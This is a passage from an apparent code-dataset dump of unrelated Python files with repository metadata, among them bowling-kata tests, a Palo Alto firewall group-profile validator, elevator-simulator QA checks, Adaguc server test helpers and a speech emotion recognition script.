parser.add_argument('-t', '--token', help='Auth token (instead of user/pass)')
parser.add_argument('-q', '--example', help='Only run the specified example.')
parser.add_argument('-v', '--verbose', default=False, action='store_true', help='Print verbose logging.')
args = parser.parse_args()
plex, account = fetch_server(args)
for example in iter_tests(args.example):
example['func'](plex)
| 36.139344
| 109
| 0.6709
| 0
| 0
| 0
| 0
| 2,764
| 0.6269
| 0
| 0
| 1,784
| 0.404627
|
368eabb014f813c693697e1b58b1279e93227806
| 1,070
|
py
|
Python
|
BowlingGame/bowling_game_test.py
|
WisWang/code-kata
|
179188e4e42686807ab3691e0fb68edac08304be
|
[
"MIT"
] | 2
|
2019-06-17T03:31:13.000Z
|
2019-06-17T03:31:16.000Z
|
BowlingGame/bowling_game_test.py
|
WisWang/code-kata
|
179188e4e42686807ab3691e0fb68edac08304be
|
[
"MIT"
] | null | null | null |
BowlingGame/bowling_game_test.py
|
WisWang/code-kata
|
179188e4e42686807ab3691e0fb68edac08304be
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017 - hongzhi.wang <hongzhi.wang@moji.com>
'''
Author: hongzhi.wang
Create Date: 2019-09-04
Modify Date: 2019-09-04
'''
import unittest
from .bowling_game import BowlingGame
class TestBowlingGame(unittest.TestCase):
def setUp(self):
self.g = BowlingGame()
def test_game_all_zero(self):
self.roll_many(20, 0)
self.assertEqual(0, self.g.score())
def test_game_all_one(self):
self.roll_many(20, 1)
self.assertEqual(20, self.g.score())
def roll_many(self, times, pin):
for i in range(times):
self.g.roll(pin)
def test_game_first_strike(self):
self.g.roll(4)
self.g.roll(6)
self.roll_many(18, 1)
self.assertEqual(29, self.g.score())
def test_perfect_game(self):
self.roll_many(12, 10)
self.assertEqual(300, self.g.score())
def test_game_first_two_strike(self):
self.roll_many(4, 5)
self.roll_many(16, 1)
self.assertEqual(42, self.g.score())
| 23.777778
| 60
| 0.626168
| 828
| 0.773832
| 0
| 0
| 0
| 0
| 0
| 0
| 180
| 0.168224
|
368f64f73686f6ce0d3e038e0daaf52552b9013c
| 1,873
|
py
|
Python
|
palo_alto_firewall_analyzer/validators/bad_group_profile.py
|
moshekaplan/palo_alto_firewall_analyzer
|
9040b85278701dcd7280dde0cf9e3ed05b2fb5d0
|
[
"CC0-1.0"
] | 4
|
2021-03-06T05:57:29.000Z
|
2022-03-11T07:10:41.000Z
|
palo_alto_firewall_analyzer/validators/bad_group_profile.py
|
moshekaplan/palo_alto_firewall_analyzer
|
9040b85278701dcd7280dde0cf9e3ed05b2fb5d0
|
[
"CC0-1.0"
] | 24
|
2021-03-05T04:53:46.000Z
|
2022-03-22T15:51:12.000Z
|
palo_alto_firewall_analyzer/validators/bad_group_profile.py
|
moshekaplan/palo_alto_firewall_analyzer
|
9040b85278701dcd7280dde0cf9e3ed05b2fb5d0
|
[
"CC0-1.0"
] | 1
|
2021-03-05T16:41:52.000Z
|
2021-03-05T16:41:52.000Z
|
from palo_alto_firewall_analyzer.core import register_policy_validator, BadEntry
@register_policy_validator("BadGroupProfile", "Rule uses an incorrect group profile")
def find_bad_group_profile_setting(profilepackage):
device_groups = profilepackage.device_groups
devicegroup_exclusive_objects = profilepackage.devicegroup_exclusive_objects
allowed_group_profiles = profilepackage.allowed_group_profiles
if not allowed_group_profiles:
return []
badentries = []
print("*"*80)
print("Checking for incorrect group profile")
for i, device_group in enumerate(device_groups):
for ruletype in ('SecurityPreRules', 'SecurityPostRules'):
rules = devicegroup_exclusive_objects[device_group][ruletype]
print (f"({i+1}/{len(device_groups)}) Checking {device_group}'s {ruletype}")
for entry in rules:
# Disabled rules can be ignored
if entry.find("./disabled") is not None and entry.find("./disabled").text == "yes":
continue
rule_name = entry.get('name')
group_profile_setting_node = entry.find("./profile-setting/group/member")
if group_profile_setting_node is not None:
group_profile_setting = group_profile_setting_node.text
else:
group_profile_setting = ""
if group_profile_setting not in allowed_group_profiles:
text = f"Device Group {device_group}'s {ruletype} '{rule_name}' doesn't use an approved group " \
f"profile '{allowed_group_profiles}', instead it uses '{group_profile_setting}' "
print (text)
badentries.append( BadEntry(data=entry, text=text, device_group=device_group, entry_type=ruletype) )
return badentries
| 45.682927
| 120
| 0.657234
| 0
| 0
| 0
| 0
| 1,790
| 0.955686
| 0
| 0
| 470
| 0.250934
|
3690831885f4829c3bfb3701534068309447ba6f
| 15,574
|
py
|
Python
|
metagym/liftsim/tests/qa_test.py
|
WorldEditors/MetaGym
|
ad7263fcc80abd6831965ab6b556d54f75e17315
|
[
"Apache-2.0"
] | null | null | null |
metagym/liftsim/tests/qa_test.py
|
WorldEditors/MetaGym
|
ad7263fcc80abd6831965ab6b556d54f75e17315
|
[
"Apache-2.0"
] | null | null | null |
metagym/liftsim/tests/qa_test.py
|
WorldEditors/MetaGym
|
ad7263fcc80abd6831965ab6b556d54f75e17315
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
qa test for elevators
Authors: likejiao(likejiao@baidu.com)
Date: 2019/06/16 19:30:16
"""
import sys
import time
import copy
import traceback
from metagym.liftsim.environment.env import LiftSim
from metagym.liftsim.environment.mansion.person_generators.generator_proxy import PersonGenerator
from metagym.liftsim.environment.mansion.mansion_config import MansionConfig
from metagym.liftsim.environment.mansion.utils import ElevatorState, MansionState, ElevatorAction
from metagym.liftsim.environment.mansion.mansion_manager import MansionManager
from rule_benchmark.dispatcher import Rule_dispatcher
fail_flag = False
stop_count = 10
def state_check(state, next_state, action):
global fail_flag
global stop_count
try:
assert isinstance(state, MansionState)
# for e in state.ElevatorStates:
for i in range(len(state.ElevatorStates)):
ele = copy.deepcopy(state.ElevatorStates[i])
assert isinstance(ele, ElevatorState)
next_ele = copy.deepcopy(next_state.ElevatorStates[i])
assert isinstance(next_ele, ElevatorState)
act = copy.deepcopy(action[i])
assert isinstance(act, ElevatorAction)
# type
ele_Floor = ele.Floor
ele_Velocity = ele.Velocity
ele_LoadWeight = ele.LoadWeight
next_ele_Floor = next_ele.Floor
next_ele_Velocity = next_ele.Velocity
next_ele_LoadWeight = next_ele.LoadWeight
assert isinstance(ele_Floor, float)
assert isinstance(ele.MaximumFloor, int)
assert isinstance(ele_Velocity, float)
assert isinstance(ele.MaximumSpeed, float)
assert isinstance(ele.Direction, int)
assert isinstance(ele.CurrentDispatchTarget, int)
assert isinstance(ele.DispatchTargetDirection, int)
assert isinstance(ele_LoadWeight, float)
assert isinstance(ele.MaximumLoad, int)
assert isinstance(ele.OverloadedAlarm, float)
assert isinstance(ele.DoorIsOpening, bool)
assert isinstance(ele.DoorIsClosing, bool)
assert isinstance(ele.ReservedTargetFloors, list)
# change
ele_Floor = round(ele_Floor, 2)
ele_Velocity = round(ele_Velocity, 2)
ele_LoadWeight = round(ele_LoadWeight, 2)
next_ele_Velocity = round(next_ele_Velocity, 2)
ele_Velocity = round(ele_Velocity, 2)
next_ele_LoadWeight = round(next_ele_LoadWeight, 2)
# range
assert ele_Floor > 0 and ele_Floor <= ele.MaximumFloor
assert ele_Velocity >= (0 - ele.MaximumSpeed) and ele_Velocity <= ele.MaximumSpeed
assert ele.Direction in [-1, 0, 1]
assert ele.CurrentDispatchTarget >= -1 and ele.CurrentDispatchTarget <= ele.MaximumFloor
assert ele.DispatchTargetDirection in [-1, 1]
assert ele_LoadWeight >= 0 and ele_LoadWeight <= ele.MaximumLoad
assert ele.OverloadedAlarm >= 0 and ele.OverloadedAlarm <= 2.0
assert ele.DoorState >= 0 and ele.DoorState <= 1
assert ele.DoorIsClosing in [True, False]
assert ele.DoorIsOpening in [True, False]
for t in ele.ReservedTargetFloors:
assert t >= 1 and t <= ele.MaximumFloor
#relation
if(ele_Velocity == 0 and ele.Direction != 0):
assert (ele_Floor % 1) == 0 or \
(ele_Floor % 1 != 0 and next_ele.Direction == 0)
if(round(ele_Floor, 1) % 1 != 0 and ele.Direction != 0):
assert ele_Velocity != 0 or next_ele_Velocity != 0 or\
next_ele.Direction == 0 or ele_Floor == ele.CurrentDispatchTarget
assert (ele.DoorIsClosing and ele.DoorIsOpening) == False
if(ele.DoorState < 1 and ele.DoorState > 0):
assert (ele.DoorIsClosing or ele.DoorIsOpening) == True
assert ele_Floor % 1 == 0
# if(ele.DoorState in [0.0, 1.0]):
# assert (ele.DoorIsClosing or ele.DoorIsOpening) == False # ignore
if(ele.DoorState in [0.0, 1.0]):
if((ele.DoorIsClosing or ele.DoorIsOpening) == True):
if(next_ele.DoorState in [0.0, 1.0]):
assert (next_ele.DoorIsClosing or next_ele.DoorIsOpening) == False
if((ele_Floor % 1 != 0) or ((ele.DoorIsClosing and ele.DoorIsOpening) == True)):
assert ele.DoorState == 0.0
assert ele.DoorIsClosing == False or next_ele.DoorIsClosing == False
assert ele.DoorIsOpening == False
if(ele_Velocity != 0.0 and ele.Direction != 0):
assert ele.DoorState == 0.0
if(ele_Velocity != 0.0 and len(ele.ReservedTargetFloors) > 0):
assert ele_LoadWeight > 0
if(ele_Velocity != 0.0 and ele_LoadWeight > 0):
assert len(ele.ReservedTargetFloors) > 0
if(next_ele.OverloadedAlarm > 0 and ele.OverloadedAlarm == 0):
assert next_ele_LoadWeight >= ele.MaximumLoad - 200
if(len(ele.ReservedTargetFloors) != 0):
assert ele_LoadWeight >= 20
# dynamic check
delta_Floor = round(next_ele_Floor - ele_Floor, 2)
assert delta_Floor * next_ele_Velocity >= 0 or delta_Floor * ele_Velocity >= 0
target_list = ele.ReservedTargetFloors[:]
# if(ele.CurrentDispatchTarget != 0):
# target_list.append(ele.CurrentDispatchTarget)
if(delta_Floor > 0 and ele_Velocity != 0.0 and ele_Floor % 1 != 0): # going up
min_target = min(target_list) if len(target_list) > 0 else ele.MaximumFloor + 1
assert ele_Floor <= min_target
assert next_ele_Velocity > 0 or ele_Velocity > 0 or ele.Direction == 0
if(delta_Floor < 0 and ele_Velocity != 0.0 and ele_Floor % 1 != 0): # going down
max_target = max(target_list) if len(target_list) > 0 else 0
assert ele_Floor >= max_target
assert next_ele_Velocity < 0 or ele_Velocity < 0 or ele.Direction == 0
# if(delta_Floor == 0):
# assert next_ele_Velocity == 0 or ele_Velocity * next_ele_Velocity <= 0
if((next_ele_LoadWeight - ele_LoadWeight) > 0.01):
assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
if((next_ele_LoadWeight - ele_LoadWeight) < -0.01):
assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
if(ele.OverloadedAlarm < next_ele.OverloadedAlarm):
assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
assert len(next_ele.ReservedTargetFloors) == len(ele.ReservedTargetFloors) #?????
# assert next_ele_LoadWeight >= ele_LoadWeight # not right
if(len(next_ele.ReservedTargetFloors) > len(ele.ReservedTargetFloors)):
assert (next_ele_LoadWeight - ele_LoadWeight) >= 0 #!!!
assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
if(len(next_ele.ReservedTargetFloors) < len(ele.ReservedTargetFloors)):
# assert (next_ele_LoadWeight - ele_LoadWeight) < 0 # not right
assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
# if(ele.OverloadedAlarm > 0):
# assert ele.ReservedTargetFloors == next_ele.ReservedTargetFloors
# assert ele_LoadWeight == next_ele_LoadWeight
# assert ele.DoorState > 0 or ele.DoorIsOpening or ele.DoorIsClosing
if(fail_flag):
stop_count -= 1
if(stop_count == 0):
print('\n\nSome error appear before several steps, please check\n\n')
exit(1)
except AssertionError:
_, _, tb = sys.exc_info()
traceback.print_tb(tb) # Fixed format
tb_info = traceback.extract_tb(tb)
filename, line, func, text = tb_info[-1]
print('An error occurred on line {} in statement {}'.format(line, text))
print('\n========================== ele num: ', i)
print('\nlast: ', ele)
print('\nthis: ', next_ele)
print('\n========================== please check\n\n')
fail_flag = True
def print_state(state, action):
assert isinstance(state, MansionState)
print('Num\tact\tact.dir\tFloor\t\tMaxF\tV\t\tMaxV\tDir\tTarget\tTDir\tLoad\tMaxL\tOver\tDoor\topening\tclosing\tReservedTargetFloors')
i = 0
for i in range(len(state.ElevatorStates)):
ele = state.ElevatorStates[i]
act = action[i]
assert isinstance(ele, ElevatorState)
assert isinstance(act, ElevatorAction)
print(i,"\t|",act.TargetFloor,"\t|",act.DirectionIndicator,"\t|",
'%2.4f'%ele.Floor,"\t|",ele.MaximumFloor,"\t|",
'%2.7f'%ele.Velocity,"\t|",ele.MaximumSpeed,"\t|",
ele.Direction,"\t|",ele.CurrentDispatchTarget,"\t|",ele.DispatchTargetDirection,"\t|",
int(ele.LoadWeight),"\t|",ele.MaximumLoad,"\t|",'%.2f'%ele.OverloadedAlarm,"\t|",
ele.DoorState,"\t|",int(ele.DoorIsOpening),"\t|",int(ele.DoorIsClosing),"\t|",ele.ReservedTargetFloors)
i += 1
print('------------------RequiringUpwardFloors', state.RequiringUpwardFloors)
print('------------------RequiringDownwardFloors', state.RequiringDownwardFloors)
print('')
# time.sleep(2)
def print_next_state(state):
assert isinstance(state, MansionState)
print('Num\tact\tact.dir\tFloor\t\tMaxF\tV\tMaxV\tDir\tTarget\tTDir\tLoad\tMaxL\tOver\tDoor\topening\tclosing\tRT')
i = 0
for i in range(len(state.ElevatorStates)):
ele = state.ElevatorStates[i]
# act = action[i]
assert isinstance(ele, ElevatorState)
# assert isinstance(act, ElevatorAction)
i += 1
print(i,"\t|",' ',"\t|",' ',"\t|",
'%.2f'%ele.Floor,"\t|",ele.MaximumFloor,"\t|",
'%.1f'%ele.Velocity,"\t|",ele.MaximumSpeed,"\t|",
ele.Direction,"\t|",ele.CurrentDispatchTarget,"\t|",ele.DispatchTargetDirection,"\t|",
'%.1f'%ele.LoadWeight,"\t|",ele.MaximumLoad,"\t|",ele.OverloadedAlarm,"\t|",
ele.DoorState,"\t|",int(ele.DoorIsOpening),"\t|",int(ele.DoorIsClosing),"\t|",ele.ReservedTargetFloors)
print('------------------RequiringUpwardFloors', state.RequiringUpwardFloors)
print('------------------RequiringDownwardFloors', state.RequiringDownwardFloors)
print('')
# time.sleep(2)
def run_mansion_main(mansion_env, policy_handle, iteration):
last_state = mansion_env.reset()
# policy_handle.link_mansion(mansion_env.attribute)
# policy_handle.load_settings()
i = 0
acc_reward = 0.0
# = copy.deepcopy(mansion_env.state)
while i < iteration:
i += 1
# state = mansion_env.state
action = policy_handle.policy(last_state)
state, r, _, _ = mansion_env.step(elevatoraction_to_list(action))
# output_info = policy_handle.feedback(last_state, action, r)
acc_reward += r
# if(isinstance(output_info, dict) and len(output_info) > 0):
# mansion_env.log_notice("%s", output_info)
if(i % 3600 == 0):
print(
"Accumulated Reward: %f, Mansion Status: %s",
acc_reward, mansion_env.statistics)
acc_reward = 0.0
print_state(state, action)
print('reward: %f' % r)
state_check(last_state, state, action)
last_state = copy.deepcopy(state)
# run main program with args
def run_qa_test(configfile, iterations, controlpolicy, set_seed=None):
print('configfile:', configfile) # configuration file for running elevators
print('iterations:', iterations) # total number of iterations
print('controlpolicy:', controlpolicy) # policy type: rule_benchmark or others
mansion_env = LiftSim(configfile)
if(set_seed):
mansion_env.seed(set_seed)
if controlpolicy == 'rule_benchmark':
dispatcher = Rule_dispatcher(mansion_env, iterations)
elif controlpolicy == 'rl_benchmark':
pass
run_mansion_main(mansion_env, dispatcher, iterations)
return 0
def run_time_step_abnormal_test(configfile, iterations, controlpolicy, set_seed=None):
try:
run_qa_test(configfile, iterations, controlpolicy, set_seed=set_seed)
except AssertionError:
print('run_time_step_abnormal_test pass')
def run_action_abnormal_test(action_target_floor, action_target_direction, set_seed):
flag = True
try:
env = LiftSim()
if(set_seed):
env.seed(set_seed)
state = env.reset()
action = [ElevatorAction(action_target_floor, action_target_direction) for i in range(4)]
next_state, reward, _, _ = env.step(elevatoraction_to_list(action))
except AssertionError:
flag = False
print('abnormal action: ', action_target_floor, type(action_target_floor) \
, action_target_direction, type(action_target_direction))
print('run_action_abnormal_test pass')
if (flag):
print('abnormal action: ', action_target_floor, type(action_target_floor) \
, action_target_direction, type(action_target_direction))
print('run_action_abnormal_test fail')
assert False
def elevatoraction_to_list(action):
action_list = []
for a in action:
action_list.append(a.TargetFloor)
action_list.append(a.DirectionIndicator)
return action_list
if __name__ == "__main__":
if (len(sys.argv) == 2):
set_seed = int(sys.argv[1])
else:
set_seed = None
run_time_step_abnormal_test('metagym/liftsim/tests/conf/config_time_step_more_than_1.ini', 100, 'rule_benchmark', set_seed)
run_action_abnormal_test(-2, 1, set_seed)
run_action_abnormal_test(10000, -1, set_seed)
run_action_abnormal_test(5.0, 1, set_seed)
run_action_abnormal_test('5', 1, set_seed)
run_action_abnormal_test(5, 4, set_seed)
run_action_abnormal_test(5, '-1', set_seed)
run_qa_test('metagym/liftsim/config.ini', 4000, 'rule_benchmark', set_seed)
run_qa_test('metagym/liftsim/tests/conf/config1.ini', 4000, 'rule_benchmark', set_seed) # 1 elevator
run_qa_test('metagym/liftsim/tests/conf/config2.ini', 4000, 'rule_benchmark', set_seed) # 100 floors 20 elevator 0.3 time_step
run_qa_test('metagym/liftsim/tests/conf/config3.ini', 4000, 'rule_benchmark', set_seed) # quick person generator
run_qa_test('metagym/liftsim/tests/conf/config4.ini', 4000, 'rule_benchmark', set_seed) # 1.0 time_step
| 46.35119
| 139
| 0.634134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,534
| 0.226917
|
3690bf8c18ffa504f4805314fbdcb1e3b4e103df
| 4,955
|
py
|
Python
|
tests/AdagucTests/AdagucTestTools.py
|
lukas-phaf/adaguc-server
|
aa5e267d6c5c15463035ff87d353707207374d1b
|
[
"Apache-2.0"
] | 1
|
2019-08-21T11:03:09.000Z
|
2019-08-21T11:03:09.000Z
|
tests/AdagucTests/AdagucTestTools.py
|
ernstdevreede/adaguc-server
|
3516bf1a2ea6abb4f2e85e72944589dfcc990f7c
|
[
"Apache-2.0"
] | null | null | null |
tests/AdagucTests/AdagucTestTools.py
|
ernstdevreede/adaguc-server
|
3516bf1a2ea6abb4f2e85e72944589dfcc990f7c
|
[
"Apache-2.0"
] | null | null | null |
import os
from io import BytesIO
import shutil
from adaguc.CGIRunner import CGIRunner
from lxml import etree
from lxml import objectify
import re
ADAGUC_PATH = os.environ['ADAGUC_PATH']
class AdagucTestTools:
def getLogFile(self):
ADAGUC_LOGFILE = os.environ['ADAGUC_LOGFILE']
try:
f = open(ADAGUC_LOGFILE)
data = f.read()
f.close()
return data
except:
pass
return ""
def printLogFile(self):
ADAGUC_LOGFILE = os.environ['ADAGUC_LOGFILE']
print("\n=== START ADAGUC LOGS ===")
print(self.getLogFile())
print("=== END ADAGUC LOGS ===")
def runADAGUCServer(self, url=None, env=[], path=None, args=None, isCGI=True, showLogOnError=True, showLog=False):
adagucenv = os.environ.copy()
adagucenv.update(env)
ADAGUC_PATH = adagucenv['ADAGUC_PATH']
ADAGUC_LOGFILE = os.environ['ADAGUC_LOGFILE']
try:
os.remove(ADAGUC_LOGFILE)
except:
pass
adagucexecutable = ADAGUC_PATH+"/bin/adagucserver"
adagucargs = [adagucexecutable]
if args is not None:
adagucargs = adagucargs + args
os.chdir(ADAGUC_PATH+"/tests")
filetogenerate = BytesIO()
status, headers = CGIRunner().run(adagucargs, url=url, output=filetogenerate,
env=adagucenv, path=path, isCGI=isCGI)
if (status != 0 and showLogOnError == True) or showLog == True:
print("\n\n--- START ADAGUC DEBUG INFO ---")
print("Adaguc-server has non zero exit status %d " % status)
if isCGI == False:
print(filetogenerate.getvalue().decode())
else:
self.printLogFile()
if status == -9:
print("Process: Killed")
if status == -11:
print("Process: Segmentation Fault ")
if len(headers) != 0:
print("=== START ADAGUC HTTP HEADER ===")
print(headers)
print("=== END ADAGUC HTTP HEADER ===")
else:
print("Process: No HTTP Headers written")
print("--- END ADAGUC DEBUG INFO ---\n")
return [status, filetogenerate, headers]
else:
return [status, filetogenerate, headers]
def writetofile(self, filename, data):
with open(filename, 'wb') as f:
f.write(data)
def readfromfile(self, filename):
ADAGUC_PATH = os.environ['ADAGUC_PATH']
with open(ADAGUC_PATH + "/tests/" + filename, 'rb') as f:
return f.read()
def cleanTempDir(self):
ADAGUC_TMP = os.environ['ADAGUC_TMP']
try:
shutil.rmtree(ADAGUC_TMP)
except:
pass
self.mkdir_p(os.environ['ADAGUC_TMP'])
return
def mkdir_p(self, directory):
if not os.path.exists(directory):
os.makedirs(directory)
def compareGetCapabilitiesXML(self, testresultFileLocation, expectedOutputFileLocation):
expectedxml = self.readfromfile(expectedOutputFileLocation)
testxml = self.readfromfile(testresultFileLocation)
obj1 = objectify.fromstring(
re.sub(b' xmlns="[^"]+"', b'', expectedxml, count=1))
obj2 = objectify.fromstring(
re.sub(b' xmlns="[^"]+"', b'', testxml, count=1))
# Remove ADAGUC build date and version from keywordlists
try:
for child in obj1.findall("Service/KeywordList")[0]:
child.getparent().remove(child)
for child in obj2.findall("Service/KeywordList")[0]:
child.getparent().remove(child)
except:
pass
try:
for child in obj1.findall("Service/ServerInfo")[0]:
child.getparent().remove(child)
for child in obj2.findall("Service/ServerInfo")[0]:
child.getparent().remove(child)
except:
pass
# Boundingbox extent values are too varying by different Proj libraries
def removeBBOX(root):
if (root.tag.title() == "Boundingbox"):
# root.getparent().remove(root)
try:
del root.attrib["minx"]
del root.attrib["miny"]
del root.attrib["maxx"]
del root.attrib["maxy"]
except:
pass
for elem in root.getchildren():
removeBBOX(elem)
removeBBOX(obj1)
removeBBOX(obj2)
result = etree.tostring(obj1)
expect = etree.tostring(obj2)
if (result == expect) is False:
print("\nExpected XML is different, file \n\"%s\"\n should be equal to \n\"%s\"" % (
testresultFileLocation, expectedOutputFileLocation))
return result == expect
| 31.967742
| 118
| 0.55439
| 4,764
| 0.961453
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.174369
|
3692f4808105d5ea767d1f2ed8ac2212b0cfd4ec
| 4,905
|
py
|
Python
|
emotion_recognition_using_speech/test.py
|
TomKingsfordUoA/emotion-recognition-using-speech
|
d3e115e32c06c511e70cb50a92097bafd00d5e6c
|
[
"MIT"
] | null | null | null |
emotion_recognition_using_speech/test.py
|
TomKingsfordUoA/emotion-recognition-using-speech
|
d3e115e32c06c511e70cb50a92097bafd00d5e6c
|
[
"MIT"
] | null | null | null |
emotion_recognition_using_speech/test.py
|
TomKingsfordUoA/emotion-recognition-using-speech
|
d3e115e32c06c511e70cb50a92097bafd00d5e6c
|
[
"MIT"
] | null | null | null |
import os
import wave
from array import array
from struct import pack
from sys import byteorder
import pyaudio
import soundfile
from .emotion_recognition import EmotionRecognizer
from .utils import get_best_estimators
THRESHOLD = 500
CHUNK_SIZE = 1024
FORMAT = pyaudio.paInt16
RATE = 16000
SILENCE = 30
def is_silent(snd_data):
"Returns 'True' if below the 'silent' threshold"
return max(snd_data) < THRESHOLD
def normalize(snd_data):
"Average the volume out"
MAXIMUM = 16384
times = float(MAXIMUM)/max(abs(i) for i in snd_data)
r = array('h')
for i in snd_data:
r.append(int(i*times))
return r
def trim(snd_data):
"Trim the blank spots at the start and end"
def _trim(snd_data):
snd_started = False
r = array('h')
for i in snd_data:
if not snd_started and abs(i)>THRESHOLD:
snd_started = True
r.append(i)
elif snd_started:
r.append(i)
return r
# Trim to the left
snd_data = _trim(snd_data)
# Trim to the right
snd_data.reverse()
snd_data = _trim(snd_data)
snd_data.reverse()
return snd_data
def add_silence(snd_data, seconds):
"Add silence to the start and end of 'snd_data' of length 'seconds' (float)"
r = array('h', [0 for i in range(int(seconds*RATE))])
r.extend(snd_data)
r.extend([0 for i in range(int(seconds*RATE))])
return r
def record():
"""
Record a word or words from the microphone and
return the data as an array of signed shorts.
Normalizes the audio, trims silence from the
start and end, and pads with 0.5 seconds of
blank sound to make sure VLC et al can play
it without getting chopped off.
"""
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=1, rate=RATE,
input=True, output=True,
frames_per_buffer=CHUNK_SIZE)
num_silent = 0
snd_started = False
r = array('h')
while 1:
# little endian, signed short
snd_data = array('h', stream.read(CHUNK_SIZE))
if byteorder == 'big':
snd_data.byteswap()
r.extend(snd_data)
silent = is_silent(snd_data)
if silent and snd_started:
num_silent += 1
elif not silent and not snd_started:
snd_started = True
if snd_started and num_silent > SILENCE:
break
sample_width = p.get_sample_size(FORMAT)
stream.stop_stream()
stream.close()
p.terminate()
r = normalize(r)
r = trim(r)
r = add_silence(r, 0.5)
return sample_width, r
def record_to_file(path):
"Records from the microphone and outputs the resulting data to 'path'"
sample_width, data = record()
data = pack('<' + ('h'*len(data)), *data)
wf = wave.open(path, 'wb')
wf.setnchannels(1)
wf.setsampwidth(sample_width)
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
def get_estimators_name(estimators):
result = [ '"{}"'.format(estimator.__class__.__name__) for estimator, _, _ in estimators ]
return ','.join(result), {estimator_name.strip('"'): estimator for estimator_name, (estimator, _, _) in zip(result, estimators)}
if __name__ == "__main__":
estimators = get_best_estimators(True)
estimators_str, estimator_dict = get_estimators_name(estimators)
import argparse
parser = argparse.ArgumentParser(description="""
Testing emotion recognition system using your voice,
please consider changing the model and/or parameters as you wish.
""")
parser.add_argument("-e", "--emotions", help=
"""Emotions to recognize separated by a comma ',', available emotions are
"neutral", "calm", "happy" "sad", "angry", "fear", "disgust", "ps" (pleasant surprise)
and "boredom", default is "sad,neutral,happy"
""", default="sad,neutral,happy")
parser.add_argument("-m", "--model", help=
"""
The model to use, 8 models available are: {},
default is "BaggingClassifier"
""".format(estimators_str), default="BaggingClassifier")
# Parse the arguments passed
args = parser.parse_args()
features = ["mfcc", "chroma", "mel"]
detector = EmotionRecognizer(estimator_dict[args.model], emotions=args.emotions.split(","), features=features, verbose=0)
detector.train()
print("Test accuracy score: {:.3f}%".format(detector.test_score()*100))
# print("Please talk")
filename = "test.wav"
record_to_file(filename)
| 30.65625
| 132
| 0.596738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,637
| 0.333741
|
369300d0c9a3d754cf6fa5fd20a01c6192f0204c
| 2,032
|
py
|
Python
|
training/dataset.py
|
liucong3/camelyon17
|
bf6947ab5f59fc98f58f4459115cde5c815f2c5b
|
[
"MIT"
] | null | null | null |
training/dataset.py
|
liucong3/camelyon17
|
bf6947ab5f59fc98f58f4459115cde5c815f2c5b
|
[
"MIT"
] | 1
|
2021-09-07T04:56:15.000Z
|
2021-09-07T04:56:15.000Z
|
training/dataset.py
|
liucong3/camelyon17
|
bf6947ab5f59fc98f58f4459115cde5c815f2c5b
|
[
"MIT"
] | 1
|
2021-09-17T02:57:42.000Z
|
2021-09-17T02:57:42.000Z
|
import numpy as np
import torch.utils.data as data
import csv
import cv2
from PIL import Image
from utils import progress_bar
class CamelDataset(data.Dataset):
""" camelyon17 dataset class for pytorch dataloader
"""
def __init__(self, csv_path='train.csv', limit=0, transform=None, target_transform=None):
super(CamelDataset, self).__init__()
self.transform = transform
self.target_transform = target_transform
self.data = []
self.labels = []
csv_file = open(csv_path, 'r', encoding='utf-8')
csv_reader = csv.reader(csv_file)
cnt = 0
p_rows = []
n_rows = []
for img, label in csv_reader:
if label == '1':
p_rows.append([img, label])
else:
n_rows.append([img, label])
rows = zip(p_rows, n_rows)
min_len = min(len(p_rows), len(n_rows))
for (p_img, p_label), (n_img, n_label) in rows:
progress_bar(cnt, min_len, csv_path)
p_array = cv2.imread(p_img, cv2.IMREAD_COLOR)
self.data.append(p_array)
self.labels.append(p_label)
n_array = cv2.imread(n_img, cv2.IMREAD_COLOR)
self.data.append(n_array)
self.labels.append(n_label)
cnt += 1
if cnt > limit / 2:
break
self.data = np.array(self.data)
self.labels = np.array(self.labels)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img = self.data[index]
img = Image.fromarray(img)
target = self.labels[index]
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
| 27.835616
| 93
| 0.563976
| 1,901
| 0.935531
| 0
| 0
| 0
| 0
| 0
| 0
| 240
| 0.11811
|
369370477fede6ca05479665d356d7b8ddbbef42
| 211
|
py
|
Python
|
src/settings/settings.py
|
lamas1901/telegram__pdf-bot
|
995bd3a41edba744efc07a99296ff109427ed310
|
[
"MIT"
] | null | null | null |
src/settings/settings.py
|
lamas1901/telegram__pdf-bot
|
995bd3a41edba744efc07a99296ff109427ed310
|
[
"MIT"
] | null | null | null |
src/settings/settings.py
|
lamas1901/telegram__pdf-bot
|
995bd3a41edba744efc07a99296ff109427ed310
|
[
"MIT"
] | null | null | null |
from ..utils import get_env_var
from pathlib import Path
BASE_DIR = Path(__file__).parent.parent
TG_TOKEN = get_env_var('TG_TOKEN')
YMONEY_TOKEN = get_env_var('YTOKEN')
PROMO_CODE = get_env_var('PROMO_CODE')
| 21.1
| 39
| 0.78673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 30
| 0.14218
|
369463a55c830c970eeba872097925e45f0b42da
| 5,365
|
py
|
Python
|
sheet.py
|
roocell/myfreelapextract
|
933cf6c50155f0659e3b06f8caf38425920f349d
|
[
"Apache-2.0"
] | null | null | null |
sheet.py
|
roocell/myfreelapextract
|
933cf6c50155f0659e3b06f8caf38425920f349d
|
[
